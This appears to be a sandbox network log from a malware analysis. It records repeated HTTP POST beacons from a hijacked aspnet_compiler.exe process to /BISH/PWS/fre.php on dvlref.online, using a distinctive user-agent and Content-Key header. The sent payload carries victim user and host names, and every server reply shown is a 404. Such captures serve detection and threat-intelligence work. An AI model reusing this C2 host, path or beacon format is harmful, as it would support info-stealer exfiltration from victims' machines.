Dec 2, 2024 14:47:13.502187014 CET	795	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UpGSsB93pjOCGtgbeUoVpqRLbpMi%2FfCIGUkZeM4fgPU0G05OACiBDnW4Sg4vr38%2BdG65YZ37MXyRlSQDSccUTcunPcWgj6SwcLQYCvi2leyguOkH%2FYtcydXBb98Yq4vC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc47ecdef0f45-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1701&min_rtt=1701&rtt_var=850&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=155&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.7	49834	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:13.776523113 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:13.896676064 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:47:15.090383053 CET	793	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7P7wxeMajzcIsoGuBizVvWycEJ5t1Z0nYYNUpTDpGsJJzVqoFPZmEuJS2QGiFR9CrLflw6ql6nPkkRtGF48%2F910RQD81%2FXIwjd8ZI66i6qDnOHKqhFFt34IGrwrhR16K"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc488ee1342b5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1616&min_rtt=1616&rtt_var=808&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.7	49836	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:15.352350950 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:15.472434998 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:47:16.779161930 CET	803	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RFWndACbUNqzGWFBorhvCR0AAjO0hV1PsSoil5ktM2%2FkKQauHe12bAo4cxaD4uipU1SVdjDU1z%2BzT3%2BV1Nz3Zxdyw1z3d%2F3L9Y11YhHlTN1ifjO%2BAFQf3XnDQxs%2B2sN%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc4934c003342-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1845&min_rtt=1845&rtt_var=922&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=148&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.7	49841	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:17.052521944 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:17.172627926 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:47:18.363347054 CET	801	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vlJRCWpovmHBCqRG0%2FbRW84GiWofS%2BFTYSVe%2BbTnN8y1zpOfNaAkrCElKx1jAkLZp%2B%2F18isbiiQE9JHCqL4%2Bm46nxr12CCC5MQmoKNvWVKCe1MRRQWgX5WUD24JcH7yg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc49d6cd47286-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1809&min_rtt=1809&rtt_var=904&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.7	49847	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:18.643647909 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:18.763775110 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:47:20.000325918 CET	801	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LIgKPzx02aGMJ7BmfoqN3%2BWsr%2BS%2FD6ndiGPHGRuwuIFHdFn0FfmmWyODJzJVGKj%2BMF%2B6rFLll7v9zQXYzxDPUBGXgpVb%2BS0WZM9MskUgqzQOxdK06A3SSGH7LYggYJkM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc4a79a42f5f7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1738&min_rtt=1738&rtt_var=869&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.7	49850	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:20.271853924 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:20.392040014 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:47:21.625751019 CET	795	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:21 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V6F8VG76NOE84Ip%2B%2BGutLaQbTcrAMNlnfb2q7oL4v4Tak8x0gyoGOVv79gWC3a0k71aDFccXwi4prh0kdKuEJ%2FraO9cweIX4jzUqf6sfCmKDIWVhSRk1ysKxvBwc3pSL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc4b17d7d42e0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1671&min_rtt=1671&rtt_var=835&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.7	49854	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:21.898245096 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:22.018416882 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:47:23.338934898 CET	804	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uJ70farsOW3uj3ES386EEqY172lsfCsZt9UB1AnST16IsWkWP5nu8hUIh%2FWE5qaT%2FZH%2BYgyZBQlecIHi%2FWuBkA%2B%2FyJNCi3%2FZnTwGWjCQAAFMitoFrCqafBRxCyQXRTe9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc4bc48c732ee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2069&min_rtt=2069&rtt_var=1034&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.7	49860	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:23.779117107 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:23.899317980 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:47:25.118474960 CET	801	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F4e6d2eBWYJinsC6QHsmO4P8tRyrnl9jgiOq4GB4JIb3bz1%2B6h8iOen3xxHo98Yd9wEZ3rJTFM3e0yc1%2FO%2BHAQ%2FNvsQ8QqCsftHal24GsX4NqJpAEEBE2Va5VDViE%2Fc5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc4c76b0943a6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1767&min_rtt=1767&rtt_var=883&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.7	49867	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:25.398736000 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:25.519040108 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:47:26.735745907 CET	790	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j55KK7ACqVuPP3I2gm448pO7l6UXPwZovrE1ZxYEkL4NeAjGfNxrvcx3ApwksYG6vXJOiWknxm6UleXeqg4E3l6Ad4BToi7YK4T6odCHY4CIkJNNIFoxEkSE6Sk0r7gt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc4d18abc4283-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2046&min_rtt=2046&rtt_var=1023&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.7	49871	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:27.005171061 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:27.125459909 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:47:28.364978075 CET	793	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sdyxGOyKiQFYLQl%2B0WqFtinamb19YU2CTQD9huf2JihXX4cgSe4ISRrf4TZIDBlCWrAboJIKvdVFGlbnk4U4VWxE3YCCHO2lZAWjKumJo8BnBorRWjuXaBvScQadN%2BFn"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc4dbddd90fab-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1626&min_rtt=1626&rtt_var=813&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.7	49875	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:28.631117105 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:28.752702951 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:47:30.056348085 CET	797	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zyC6gr5AZD3T0IcC9FM8MJYxTKNHluPr43TqP9wLUGg1%2Bwx6UmHHGNcO0YNvEV7ZxYbjWO1bobzzUcTbBu%2FVokr0B7vGNU5qI3hZHXN%2FfLZzdld9ge%2BDClP2tmXIG4hH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc4e649f642bf-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1692&min_rtt=1692&rtt_var=846&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.7	49882	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:30.321640968 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:30.441791058 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:47:31.749869108 CET	801	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pYPCZ9NN6k1M3q2VaboJl01pKoW2goM8QsxR7dqnFB%2BmMZeM%2BI5GA%2Bf5lHKLygLVb84bZ6rXqIFLww1CpPZ%2FNjDCNm2qXN%2F4DheYM4osC23L%2Fb9R0ASpcWGRv9xQxOah"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc4f0cbbf5e62-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1668&min_rtt=1668&rtt_var=834&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=143&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.7	49887	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:32.021401882 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:32.141391993 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:47:33.456372976 CET	796	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:33 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wZoOv1074rXKiMYz6mxUfrBSQ6l3%2F81U6Xc2t7pqxid1ZdSXypMf0L2WmENWQrzw%2FO%2FFFvUeHKB6B7HYH3iMvUzAG6Aoeb1SWZW%2FkiW2Mfo3ZYY4F8t8nigBZDfvI35G"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc4fb6d494397-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1704&min_rtt=1704&rtt_var=852&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=65&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.7	49891	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:33.739841938 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:33.859801054 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
